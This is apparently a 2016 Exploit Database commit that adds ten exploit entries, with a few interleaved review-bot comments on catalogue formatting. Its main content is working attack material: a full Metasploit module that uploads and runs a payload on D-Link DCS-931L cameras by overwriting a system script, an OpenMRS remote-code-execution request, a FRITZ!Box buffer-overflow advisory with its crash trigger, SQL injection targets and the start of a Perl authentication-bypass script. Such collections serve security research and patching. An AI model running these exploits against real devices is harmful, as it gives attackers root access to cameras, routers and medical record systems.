From 97940c47e29d6606419cdd3c613043a367bdde44 Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Fri, 8 Jan 2016 05:03:43 +0000
Subject: [PATCH] DB: 2016-01-08 10 new exploits
---
 files.csv | 19 +-
 platforms/asp/webapps/39187.txt | 7 +
 platforms/hardware/webapps/39192.rb | 210 ++++++++++++++++++++
 platforms/hardware/webapps/39194.txt | 277 +++++++++++++++++++++++++++
 platforms/java/webapps/39193.txt | 55 ++++++
 platforms/multiple/remote/39186.pl | 34 ++++
 platforms/php/webapps/15237.rb | 83 ++++++++
 platforms/php/webapps/39188.txt | 9 +
 platforms/php/webapps/39189.txt | 7 +
 platforms/php/webapps/39190.php | 18 ++
 platforms/php/webapps/39191.txt | 7 +
 11 files changed, 721 insertions(+), 5 deletions(-)
 create mode 100755 platforms/asp/webapps/39187.txt
 create mode 100755 platforms/hardware/webapps/39192.rb
 create mode 100755 platforms/hardware/webapps/39194.txt
 create mode 100755 platforms/java/webapps/39193.txt
 create mode 100755 platforms/multiple/remote/39186.pl
 create mode 100755 platforms/php/webapps/15237.rb
 create mode 100755 platforms/php/webapps/39188.txt
 create mode 100755 platforms/php/webapps/39189.txt
 create mode 100755 platforms/php/webapps/39190.php
 create mode 100755 platforms/php/webapps/39191.txt
diff --git a/files.csv b/files.csv
index 38e93c809..0dab234c2 100755
--- a/files.csv
+++ b/files.csv
@@ -9381,7 +9381,7 @@ id,file,description,date,author,platform,type,port
 10005,platforms/windows/dos/10005.py,"Windows 7 / Server 2008R2 - Remote Kernel Crash",2009-11-11,"laurent gaffie",windows,dos,445
 10006,platforms/php/webapps/10006.txt,"DreamPoll 3.1 Vulnerabilities",2009-10-08,"Mark from infosecstuff",php,webapps,0
 10007,platforms/windows/remote/10007.html,"EasyMail Objects EMSMTP.DLL 6.0.1 - ActiveX Control Remote Buffer Overflow Vulnerability",2009-11-12,"Will Dormann",windows,remote,0
-10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities",2009-11-11,"Carsten Eiram",windows,local,0
+10009,platforms/windows/local/10009.txt,"Free Download Manager Torrent File Parsing - Multiple Remote Buffer Overflow Vulnerabilities (Metasploit)",2009-11-11,"Carsten Eiram",windows,local,0
 10010,platforms/windows/local/10010.txt,"Free WMA MP3 Converter 1.1 - (.wav) Local Buffer Overflow",2009-10-09,KriPpLer,windows,local,0
 10011,platforms/hardware/remote/10011.txt,"HP LaserJet printers - Multiple Stored XSS Vulnerabilities",2009-10-07,"Digital Security Research Group",hardware,remote,80
 10012,platforms/multiple/webapps/10012.py,"html2ps - 'include file' Server Side Include Directive Directory Traversal Vulnerability",2009-09-25,epiphant,multiple,webapps,0
@@ -12598,7 +12598,7 @@ id,file,description,date,author,platform,type,port
 14336,platforms/php/webapps/14336.txt,"Joomla EasyBlog Persistent XSS Vulnerability",2010-07-12,Sid3^effects,php,webapps,0
 14337,platforms/php/webapps/14337.html,"TheHostingTool 1.2.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14338,platforms/php/webapps/14338.html,"GetSimple CMS 2.01 - Multiple Vulnerabilities (XSS/CSRF)",2010-07-12,10n1z3d,php,webapps,0
-14339,platforms/linux/local/14339.sh,"Ubuntu PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0
+14339,platforms/linux/local/14339.sh,"Ubuntu 9.10 (Karmic Koala) & 10.04 LTS (Lucid Lynx) PAM 1.1.0 MOTD - Local Root Exploit",2010-07-12,anonymous,linux,local,0
 14342,platforms/php/webapps/14342.html,"Grafik CMS 1.1.2 - Multiple CSRF Vulnerabilities",2010-07-12,10n1z3d,php,webapps,0
 14355,platforms/windows/webapps/14355.txt,"dotDefender 4.02 - Authentication Bypass Vulnerability",2010-07-13,"David K",windows,webapps,0
 14344,platforms/windows/dos/14344.c,"Corel WordPerfect Office X5 15.0.0.357 (wpd) Buffer Overflow PoC",2010-07-12,LiquidWorm,windows,dos,0
@@ -13266,7 +13266,7 @@ id,file,description,date,author,platform,type,port
 15235,platforms/windows/remote/15235.html,"AoA Audio Extractor 2.x - ActiveX ROP Exploit",2010-10-11,mr_me,windows,remote,0
 15606,platforms/php/webapps/15606.txt,"phpvidz 0.9.5 Administrative Credentials Disclosure",2010-11-24,"Michael Brooks",php,webapps,0
 15607,platforms/php/webapps/15607.txt,"WSN Links - SQL Injection Vulnerability",2010-11-24,"Mark Stanislav",php,webapps,0
-15237,platforms/php/webapps/15237.txt,"AdaptCMS 2.0.1 Beta Release Remote File Inclusion Vulnerability (msf)",2010-10-12,v3n0m,php,webapps,0
+15237,platforms/php/webapps/15237.rb,"AdaptCMS 2.0.1 Beta Release - Remote File Inclusion Vulnerability (Metasploit)",2010-10-12,v3n0m,php,webapps,0
 15238,platforms/windows/remote/15238.py,"Disk Pulse Server 2.2.34 - Remote Buffer Overflow Exploit",2010-10-12,"xsploited security",windows,remote,0
 15239,platforms/php/webapps/15239.html,"WikiWebHelp 0.3.3 - Cross-Site Request Forgery Vulnerability",2010-10-12,Yoyahack,php,webapps,0
 15240,platforms/php/webapps/15240.txt,"Collabtive 0.65 - Multiple Vulnerabilities",2010-10-12,"Anatolia Security",php,webapps,0
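Review bot: The 15237 row's path changes from platforms/php/webapps/15237.txt to platforms/php/webapps/15237.rb, but the patch's diffstat lists only the creation of the .rb file and no deletion of the .txt, so if the old file is present in the tree it is now unreferenced by files.csv. Either remove platforms/php/webapps/15237.txt in the same commit or keep a row for it; the convention used elsewhere in this patch (33598/33599) is one row per file.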
@@ -30291,8 +30291,8 @@ id,file,description,date,author,platform,type,port
 33595,platforms/php/webapps/33595.txt,"Interspire Knowledge Manager < 5.1.3 - Multiple Remote Vulnerabilities",2010-02-04,"Cory Marsh",php,webapps,0
 33596,platforms/jsp/webapps/33596.txt,"KnowGate hipergate 4.0.12 - Multiple Cross-Site Scripting Vulnerabilities",2010-02-04,"Nahuel Grisolia",jsp,webapps,0
 33597,platforms/php/webapps/33597.txt,"Data 1 Systems UltraBB 1.17 - 'view_post.php' Cross-Site Scripting Vulnerability",2010-02-04,s4r4d0,php,webapps,0
-33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability",2010-02-04,kingcope,linux,remote,0
-33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 Symlink Directory Traversal Vulnerability (2)",2010-02-04,kingcope,linux,remote,0
+33598,platforms/linux/remote/33598.rb,"Samba <= 3.4.5 - Symlink Directory Traversal Vulnerability (Metasploit)",2010-02-04,kingcope,linux,remote,0
+33599,platforms/linux/remote/33599.txt,"Samba <= 3.4.5 - Symlink Directory Traversal Vulnerability (C)",2010-02-04,kingcope,linux,remote,0
 33600,platforms/multiple/remote/33600.rb,"Oracle 10g - Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
 33601,platforms/multiple/remote/33601.rb,"Oracle 11g - Multiple Remote Privilege Escalation Vulnerabilities",2010-02-05,"David Litchfield",multiple,remote,0
 33602,platforms/php/webapps/33602.txt,"evalSMSI 2.1.3 - Multiple Input Validation Vulnerabilities",2010-02-05,ekse,php,webapps,0
@@ -35432,3 +35432,12 @@ id,file,description,date,author,platform,type,port
 39183,platforms/windows/dos/39183.py,"ALLPlayer '.wav' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
 39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
 39185,platforms/lin_x86-64/shellcode/39185.c,"TCP Reverse Shell with Password Prompt - 151 bytes",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0
+39186,platforms/multiple/remote/39186.pl,"UPS Web/SNMP-Manager CS121 Authentication Bypass Vulnerability",2014-05-15,jkmac,multiple,remote,0
+39187,platforms/asp/webapps/39187.txt,"CIS Manager 'email' Parameter SQL Injection Vulnerability",2014-05-16,Edge,asp,webapps,0
+39188,platforms/php/webapps/39188.txt,"Glossaire Module for XOOPS '/modules/glossaire/glossaire-aff.php' SQL Injection Vulnerability",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39189,platforms/php/webapps/39189.txt,"Softmatica SMART iPBX Multiple SQL Injection Vulnerabilities",2014-05-19,"AtT4CKxT3rR0r1ST ",php,webapps,0
+39190,platforms/php/webapps/39190.php,"WordPress cnhk-slideshow Plugin Arbitrary File Upload Vulnerability",2014-05-18,"Ashiyane Digital Security Team",php,webapps,0
+39191,platforms/php/webapps/39191.txt,"Clipperz Password Manager 'backend/php/src/setup/rpc.php' Remote Code Execution Vulnerability",2014-05-20,"Manish Tanwar",php,webapps,0
+39192,platforms/hardware/webapps/39192.rb,"D-Link DCS-931L File Upload",2016-01-07,metasploit,hardware,webapps,0
+39193,platforms/java/webapps/39193.txt,"OpenMRS Reporting Module 0.9.7 - Remote Code Execution",2016-01-07,"Brian D. Hysell",java,webapps,0
+39194,platforms/hardware/webapps/39194.txt,"AVM FRITZ!Box < 6.30 - Buffer Overflow",2016-01-07,"RedTeam Pentesting",hardware,webapps,0
diff --git a/platforms/asp/webapps/39187.txt b/platforms/asp/webapps/39187.txt
new file mode 100755
index 000000000..4ca12433a
--- /dev/null
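Review bot: The author field of the new 39188 and 39189 rows carries a trailing space inside the quotes (`"AtT4CKxT3rR0r1ST "`), which makes the value differ from a trimmed `AtT4CKxT3rR0r1ST` and will split this author across two spellings in any grouping or search; trim it to `"AtT4CKxT3rR0r1ST"`. The 39192 row for the Metasploit module is described as `D-Link DCS-931L File Upload` without the `(Metasploit)` suffix that the earlier hunks of this same patch add to the renamed entries (10009, 15237, 33598), so the naming convention the commit itself introduces is not applied to its own new entry.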
+++ b/platforms/asp/webapps/39187.txt
@@ -0,0 +1,7 @@
+source: http://www.securityfocus.com/bid/67442/info
+
+CIS Manager is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
+
+A successful exploit will allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
+
+http://www.example.com/autenticar/lembrarlogin.asp?email=[SQL Injection]
\ No newline at end of file
diff --git a/platforms/hardware/webapps/39192.rb b/platforms/hardware/webapps/39192.rb
new file mode 100755
index 000000000..7c22e3402
--- /dev/null
+++ b/platforms/hardware/webapps/39192.rb
@@ -0,0 +1,210 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = GreatRanking + + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + HttpFingerprint = { :pattern => [ /alphapd/ ] } + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'D-Link DCS-931L File Upload', + 'Description' => %q{ + This module exploits a file upload vulnerability in D-Link DCS-931L + network cameras. The setFileUpload functionality allows authenticated + users to upload files to anywhere on the file system, allowing system + files to be overwritten, resulting in execution of arbitrary commands. + This module has been tested successfully on a D-Link DCS-931L with + firmware versions 1.01_B7 (2013-04-19) and 1.04_B1 (2014-04-21). + D-Link DCS-930L, DCS-932L, DCS-933L models are also reportedly + affected, but untested. + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Mike Baucom', 'Allen Harper', 'J. 
Rach', # Initial discovery by Tangible Security + 'Brendan Coles ' # Metasploit + ], + 'Payload' => + { + 'Space' => 1024, # File upload + 'DisableNops' => true + }, + 'Platform' => 'linux', + 'Privileged' => false, + 'Targets' => + [ + [ 'Linux mipsle Payload', + { + 'Arch' => ARCH_MIPSLE, + 'Platform' => 'linux' + } + ] + ], + 'DefaultTarget' => 0, + 'References' => + [ + [ 'CVE', '2015-2049' ], + [ 'URL', 'https://tangiblesecurity.com/index.php/announcements/tangible-security-researchers-notified-and-assisted-d-link-with-fixing-critical-device-vulnerabilities' ], + [ 'URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10049' ] # Vendor advisory + ], + 'DisclosureDate' => 'Feb 23 2015')) + + register_options( + [ + OptString.new('USERNAME', [true, 'Camera username', 'admin']), + OptString.new('PASSWORD', [false, 'Camera password (default: blank)', '']) + ], self.class) + end + + def check + res = send_request_cgi( + 'uri' => normalize_uri('uploadfile.htm'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'] + )) + + unless res + vprint_status("#{peer} - The connection timed out.") + return Exploit::CheckCode::Unknown + end + + if res.code && res.code == 404 + vprint_status("#{peer} - uploadfile.htm does not exist") + return Exploit::CheckCode::Safe + elsif res.code && res.code == 401 && res.headers['WWW-Authenticate'] =~ /realm="DCS\-931L"/ + vprint_error("#{peer} - Authentication failed") + return Exploit::CheckCode::Detected + elsif res.code && res.code == 200 && res.body && res.body =~ /Upload File/ + return Exploit::CheckCode::Vulnerable + end + Exploit::CheckCode::Safe + end + + def exploit + payload_path = "/tmp/.#{rand_text_alphanumeric(rand(8) + 5)}" + + # upload payload + res = upload(payload_path, generate_payload_exe) + + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + if res.code && res.code == 404 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed 
or setFileUpload functionality does not exist") + elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ + print_good("#{peer} - Payload uploaded successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload payload") + end + register_file_for_cleanup(payload_path) + + # overwrite /sbin/chpasswd.sh with stub + res = upload('/sbin/chpasswd.sh', "#!/bin/sh\n#{payload_path}&\n") + + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + if res.code && res.code == 404 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed or setFileUpload functionality does not exist") + elsif res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ + print_good("#{peer} - Stager uploaded successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Unable to upload stager") + end + + # execute payload using stub + res = send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri('setSystemAdmin'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), + 'vars_post' => Hash[{ + 'ReplySuccessPage' => 'advanced.htm', + 'ReplyErrorPage' => 'errradv.htm', + 'ConfigSystemAdmin' => 'Apply' + }.to_a.shuffle]) + + unless res + fail_with(Failure::Unreachable, "#{peer} - Connection failed") + end + + if res.code && res.code == 401 + fail_with(Failure::NoAccess, "#{peer} - Authentication failed") + elsif res.code && res.code == 200 && res.body + print_good("#{peer} - Payload executed successfully") + else + fail_with(Failure::UnexpectedReply, "#{peer} - Payload execution failed") + end + end + + # + # Replace chpasswd.sh with original contents + # + def cleanup + chpasswd = <<-EOF +#!/bin/sh +# +# $Id: chpasswd.sh, v1.00 2009-11-05 andy +# +# usage: chpasswd.sh [] +# + +if [ "$1" == "" ]; then + echo "chpasswd: no user name" + exit 1 +fi + +echo "$1:$2" > /tmp/tmpchpw +chpasswd < /tmp/tmpchpw +rm -f /tmp/tmpchpw +EOF + res = 
upload('/sbin/chpasswd.sh', chpasswd) + if res && res.code && res.code == 200 && res.body && res.body =~ /File had been uploaded/ + vprint_good("#{peer} - Restored /sbin/chpasswd.sh successfully") + else + vprint_warning("#{peer} - Could not restore /sbin/chpasswd.sh to default") + end + end + + # + # Upload a file to a specified path + # + def upload(path, data) + vprint_status("#{peer} - Writing #{data.length} bytes to #{path}") + + boundary = "----WebKitFormBoundary#{rand_text_alphanumeric(rand(10) + 5)}" + post_data = "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"ReplySuccessPage\"\r\n" + post_data << "\r\nreplyuf.htm\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"ReplyErrorPage\"\r\n" + post_data << "\r\nreplyuf.htm\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"Filename\"\r\n" + post_data << "\r\n#{path}\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"UploadFile\"; filename=\"#{rand_text_alphanumeric(rand(8) + 5)}\"\r\n" + post_data << "Content-Type: application/octet-stream\r\n" + post_data << "\r\n#{data}\r\n" + post_data << "--#{boundary}\r\n" + post_data << "Content-Disposition: form-data; name=\"ConfigUploadFile\"\r\n" + post_data << "\r\nUpload File\r\n" + post_data << "--#{boundary}\r\n" + + send_request_cgi( + 'method' => 'POST', + 'uri' => normalize_uri('setFileUpload'), + 'authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD']), + 'ctype' => "multipart/form-data; boundary=#{boundary}", + 'data' => post_data) + end +end \ No newline at end of file diff --git a/platforms/hardware/webapps/39194.txt b/platforms/hardware/webapps/39194.txt new file mode 100755 index 000000000..8a00e7f4d --- /dev/null +++ b/platforms/hardware/webapps/39194.txt 
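Review bot: `cleanup` restores /sbin/chpasswd.sh from a hard-coded copy whose own header says `v1.00 2009-11-05`, while the module is only documented as tested on firmware 1.01_B7 and 1.04_B1; on any other firmware the "restore" may leave a script that differs from what the device originally shipped, and nothing in the module records that. The comment `# Replace chpasswd.sh with original contents` should state the provenance and the caveat, e.g. `# Restore /sbin/chpasswd.sh from a copy matching the tested firmware (1.01_B7 / 1.04_B1 - confirm); other firmware may ship a different script`. A failed restore only emits `vprint_warning`, so the stub written by `exploit` stays on the device in that case; saying so in the same comment tells an operator what to check afterwards.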
@@ -0,0 +1,277 @@ +Advisory: AVM FRITZ!Box: Remote Code Execution via Buffer Overflow + +RedTeam Pentesting discovered that several models of the AVM FRITZ!Box +are vulnerable to a stack-based buffer overflow, which allows attackers +to execute arbitrary code on the device. + + +Details +======= + +Product: AVM FRITZ!Box 3272/7272, 3370/3390/3490, 7312/7412, + 7320/7330 (SL), 736x (SL) and 7490 +Affected Versions: versions prior to 6.30 (all models) [0] +Fixed Versions: >= 6.30 (all models) [0] +Vulnerability Type: Buffer Overflow +Security Risk: high +Vendor URL: http://avm.de/ +Vendor Status: fixed version released +Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2015-001 +Advisory Status: published +CVE: GENERIC-MAP-NOMATCH +CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH + + +Introduction +============ + +FRITZ!Box is the brand name of SOHO routers/CPEs manufactured by AVM +GmbH. The FRITZ!Box usually combines features such as an xDSL modem, a +wifi access point, routing, VoIP, NAS and DECT. + + +More Details +============ + +When examining the running processes on a FRITZ!Box, it was discovered +that the program dsl_control listens on TCP port 8080: + +# netstat -anp | grep dsl_control +tcp 0 0 0.0.0.0:8080 0.0.0.0:* LISTEN 849/dsl_control + +By sending an HTTP request to the service, it can be seen in the +server's response that the daemon expects SOAP messages (output +shortened): + +$ curl --silent http://fritz.box:8080/ | xmllint -format - + + + + + SOAP-ENV:Client + HTTP GET method not implemented + + + + +After examining the dsl_control binary by using GNU strings and +performing a web search for some of the resulting values, it was quickly +discovered that parts of the daemon's source code can be found in the +Git repository of the dd-wrt firmware[1]. 
+ +In order to retrieve the list of all commands that are implemented by +the daemon, the following SOAP message can be sent to the server, +specifying an ifx:DslCpeCliAccess element containing an empty command +element (output shortened): + +$ curl --silent http://fritz.box:8080/ --data ' + + + + + + + +' | xmllint -format - + +[...] + + avmcr, avmcrmr, avmcrms, avmcw, avmdsmmcs, avmhwrfit, +avmpet, avmvig, acog, acos, acs, alf, asecg, asecs, asg, aufg, alig, +bbsg, bpstg, bpsg, ccadbgmlg, ccadbgmls, dbgmlg, dbgmls, dsmcg, dsmcs, +dsmmcg, dsmmcs, dsmstatg, dsmsg, dsnrg, dmms, dms, esmcg, esmcs, fddg, +fdsg, fpsg, g997amdpfcg, g997amdpfcs, g997amlfcg, g997amlfcs, g997bang, +g997bansg, g997cdrtcg, g997cdrtcs, g997csg, g997dpfsg, g997dfr, +g997dhling, g997dhlinsg, g997dhlogg, g997dqlng, g997dsnrg, g997fpsg, +g997gang, g997gansg, g997lstg, g997lacg, g997lacs, g997lfsg, g997lisg, +g997lig, g997listrg, g997lis, g997lsg, g997lspbg, g997ltsg, g997lpmcg, +g997lpmcs, g997pmsft, g997pmsg, g997racg, g997racs, g997sang, g997sansg, +g997upbosg, g997xtusecg, g997xtusecs, g997xtusesg, help, hsdg, ics, isg, +lecg, lfcg, lfcs, lfsg, locg, locs, lsg, llsg, llcg, llcs, mlsg, nsecg, +nsecs, osg, pm15meet, pmbms, pmcc15mg, pmcc1dg, pmccsg, pmcctg, +pmchs15mg, pmchs1dg, pmct15mg, pmct15ms, pmct1dg, pmct1ds, pmcg, pmcs, +pmdpc15mg, pmdpc1dg, pmdpcsg, pmdpctg, pmdpfc15mg, pmdpfc1dg, pmdpfcsg, +pmdpfctg, pmdpfhs15mg, pmdpfhs1dg, pmdphs15mg, pmdphs1dg, pmdpt15mg, +pmdpt15ms, pmdpt1dg, pmdpt1ds, pmetr, pmlesc15mg, pmlesc1dg, pmlescsg, +pmlesctg, pmleshs15mg, pmleshs1dg, pmlic15mg, pmlic1dg, pmlicsg, +pmlictg, pmlihs15mg, pmlihs1dg, pmlit15mg, pmlit15ms, pmlit1dg, +pmlit1ds, pmlsc15mg, pmlsc1dg, pmlscsg, pmlsctg, pmlshs15mg, pmlshs1dg, +pmlst15mg, pmlst15ms, pmlst1dg, pmlst1ds, pmrtc15mg, pmrtc1dg, pmrtcsg, +pmrtctg, pmrths15mg, pmrths1dg, pmrtt15mg, pmrtt15ms, pmrtt1dg, +pmrtt1ds, pmr, pmsmg, pmsms, ptsg, quit, rtsg, rccg, rccs, rsss, rusg, +se, sicg, sics, sisg, tcpmistart, tcpmistop, tmcs, 
tmsg, vig, + + + + +As can be seen in the listing, the server implements several commands. +Many of them can be accessed without any authentication. One of the +commands which was further examined is the 'se' or 'ScriptExecute' +command. It is defined by the file dsl_cpe_cli_access.c, which registers +the function DSL_CPE_CLI_ScriptExecute as the corresponding handler: + +[...] + DSL_CPE_CLI_CMD_ADD_COMM ( + "se", + "ScriptExecute", + DSL_CPE_CLI_ScriptExecute, + g_sSe); +[...] + +The following listing shows dd-wrt's implementation of the command, +which is also part of the file dsl_cpe_cli_access.c (shortened): + +DSL_CLI_LOCAL DSL_int_t DSL_CPE_CLI_ScriptExecute( + DSL_int_t fd, + DSL_char_t *pCommands, + DSL_CPE_File_t *out) +{ + DSL_int_t ret = 0; + DSL_char_t sFileName[DSL_MAX_COMMAND_LINE_LENGTH] = {0}; + + if (DSL_CPE_CLI_CheckParamNumber(pCommands, 1, DSL_CLI_EQUALS) == + DSL_FALSE) + { + return -1; + } + + DSL_CPE_sscanf (pCommands, "%s", sFileName); + + [...] + + return 0; +} + +As can be seen in the listing, the function first checks whether +another parameter is given by calling the function +DSL_CPE_CLI_CheckParamNumber(). If this is the case, the code proceeds +to call the function DSL_CPE_sscanf() in order to copy the value of the +parameter pCommands to the local char array sFileName. Because the +format string "%s" is provided to the DSL_CPE_sscanf() function, no +restriction applies to how much data is copied to the array. Therefore, +an overlong argument passed to the function may possibly exceed the +array's bounds, leading to a buffer overflow. 
In order to verify that +this is the case, the following SOAP message was stored in the file +trigger.xml, containing 300 capital A characters as the argument for the +'se' command (output shortened): + + + + + + se AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA +AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA + + + + +Afterwards, curl was used to send the SOAP message to the service: + +$ curl --data @trigger.xml http://fritz.box:8080/ +curl: (52) Empty reply from server + +As indicated by curl's output, no HTTP reply was received. Instead, the +connection was closed. When accessing the device by using telnet, the +following crash dump is printed when sending the request, clearly +showing that the presumed buffer overflow was triggered: + +dsl_control[841] crashed at 41414140 [...] accessing 0x41414140 +Version: 06.24 +at: 2ac783d8 v0: 00000000 v1: ffffffff +a0: 2ac0ac08 a1: 00000001 a2: 00473420 a3: 00000001 +t0: 2aab5280 t1: 8ead1b2c t2: 41414141 t3: 41414141 +t4: 41414141 t5: 00000001 t6: 2ac4d788 t7: 41414141 +s0: 41414141 s1: 41414141 s2: 00000000 s3: 2ad800b0 +s4: 2ad800b0 s5: 00000000 s6: 00080000 s7: 2ab52358 +t8: 00000000 t9: 2ab3dc10 +gp: 00473420 sp: 2ad7fcd0 fp: 2ad7ffe0 ra: 41414141 + +As seen in the crash dump, several saved registers were overwritten by +the capital 'A' characters (0x41) provided in the SOAP message. Among +those registers is the ra register, which stores the return address of +the current function call, thus allowing an attacker to directly alter +the control flow. This behaviour can be exploited in order to execute +arbitrary code. Due to firewall restrictions, the service is only +accessible from within the internal network connected to the FRITZ!Box. 
+However, it is also possible to exploit this vulnerability by utilising +cross-site request forgery, allowing typical "drive-by" exploitation +through a user's web browser. + + +Workaround +========== + +None. + + +Fix +=== + +Affected users should upgrade to a fixed firmware version as soon as +possible. + + +Security Risk +============= + +After successful exploitation, attackers gain root privileges on the +attacked device. This allows attackers to eavesdrop on traffic and to +initiate and receive arbitrary phone calls, if the device is configured +for telephony. Furthermore, backdoors may be installed to allow +persistent access to the device. + +In order to exploit the vulnerability, attackers either need to be able +to connect to the service directly, i.e. from the LAN, or indirectly via +an attacker-controlled website, that is visited by a FRITZ!Box user. +This website can exploit the vulnerability via cross-site request +forgery, connecting to the service via the attacked user's browser. +Therefore, it is estimated that the vulnerability poses a high risk. + + +Timeline +======== + +2015-02-26 Vulnerability identified +2015-03-26 CVE number requested +2015-03-26 Vendor notified +2015-04-30 RedTeam Pentesting reviewed fixed version by order of vendor +2015-06-09 Vendor released fixed public beta (7490) +2015-07-16 Vendor started releasing fixed versions (7360 and 7490) +2015-10-01 Vendor finished releasing fixed versions (other models [0]) +2015-11-27 Advisory release postponed to maximize patch distribution +2016-01-07 Advisory released + + +References +========== + +[0] https://avm.de/service/sicherheitshinweise/ +[1] https://github.com/mirror/dd-wrt/tree/master/src/router/dsl_cpe_control + + +RedTeam Pentesting GmbH +======================= + +RedTeam Pentesting offers individual penetration tests performed by a +team of specialised IT-security experts. 
Hereby, security weaknesses in +company networks or products are uncovered and can be fixed immediately. + +As there are only few experts in this field, RedTeam Pentesting wants to +share its knowledge and enhance the public knowledge with research in +security-related areas. The results are made available as public +security advisories. + +More information about RedTeam Pentesting can be found at: +https://www.redteam-pentesting.de/ + +-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 +Dennewartstr. 25-27 Fax : +49 241 510081-99 +52068 Aachen https://www.redteam-pentesting.de +Germany Registergericht: Aachen HRB 14004 +Geschäftsführer: Patrick Hof, Jens Liebchen + diff --git a/platforms/java/webapps/39193.txt b/platforms/java/webapps/39193.txt new file mode 100755 index 000000000..87a9ba064 --- /dev/null +++ b/platforms/java/webapps/39193.txt 
@@ -0,0 +1,55 @@
+Title: Unauthenticated remote code execution in OpenMRS
+Product: OpenMRS
+Vendor: OpenMRS Inc.
+Tested versions: See summary
+Status: Fixed by vendor
+Reported by: Brian D. Hysell
+
+Product description:
+
+OpenMRS is "the world's leading open source enterprise electronic
+medical record system platform."
+
+Vulnerability summary:
+
+The OpenMRS Reporting Module 0.9.7 passes untrusted XML input to a
+version of the XStream library vulnerable to CVE-2013-7285, making it
+vulnerable to remote code execution. If the Appointment Scheduling UI
+Module 1.0.3 is also installed, this RCE is accessible to
+unauthenticated attackers. OpenMRS Standalone 2.3 and OpenMRS Platform
+1.11.4 WAR with Reporting 0.9.7 and Appointment Scheduling UI 1.0.3
+installed were confirmed to be vulnerable; other versions and
+configurations containing these modules are likely to be vulnerable as
+well (see "Remediation").
+
+Details:
+
+In the Reporting module, the method saveSerializedDefinition (mapped
+to module/reporting/definition/saveSerializedDefinition) in
+InvalidSerializedDefinitionController can be accessed by an
+unauthenticated user.
+
+The attacker must provide a valid UUID for a definition present in
+OpenMRS or a NullPointerException will be thrown before the remote
+code execution can take place. However, upon initialization the
+Appointments Scheduling UI module inserts a definition with a constant
+UUID hard-coded into AppointmentSchedulingUIConstants
+(c1bf0730-e69e-11e3-ac10-0800200c9a66).
+
+Proof of concept:
+
+GET /openmrs-standalone/module/reporting/definition/saveSerializedDefinition.form?type=org.openmrs.OpenmrsObject&serializationClass=org.openmrs.module.serialization.xstream.XStreamSerializer&serializedData=org.openmrs.OpenmrsObjectcalc.exestart&uuid=c1bf0730-e69e-11e3-ac10-0800200c9a66&name=test&subtype=org.openmrs.OpenmrsObject
+
+Remediation:
+
+The vendor has addressed this issue in OpenMRS Standalone 2.3.1,
+OpenMRS Reference Application 2.3.1, and OpenMRS Platform 1.11.5,
+1.10.3, and 1.9.10.
+
+Timeline:
+
+Vendor contacted: November 2, 2015
+Vendor replied: November 3
+CVE requested: November 14 (no response)
+Patch released: December 2
+Announced: January 6, 2016
\ No newline at end of file
diff --git a/platforms/multiple/remote/39186.pl b/platforms/multiple/remote/39186.pl
new file mode 100755
index 000000000..82449323e
--- /dev/null
+++ b/platforms/multiple/remote/39186.pl
@@ -0,0 +1,34 @@
+source: http://www.securityfocus.com/bid/67438/info
+
+UPS Web/SNMP-Manager CS121 is prone to an authentication-bypass vulnerability.
+
+Attackers can exploit this issue to bypass authentication mechanism and gain access to the HTTP(s), SNMP or Telnet port service.
+
+#!/usr/bin/perl -w
+use IO::Socket;
+use constant MAXBYTES => scalar 1024;
+
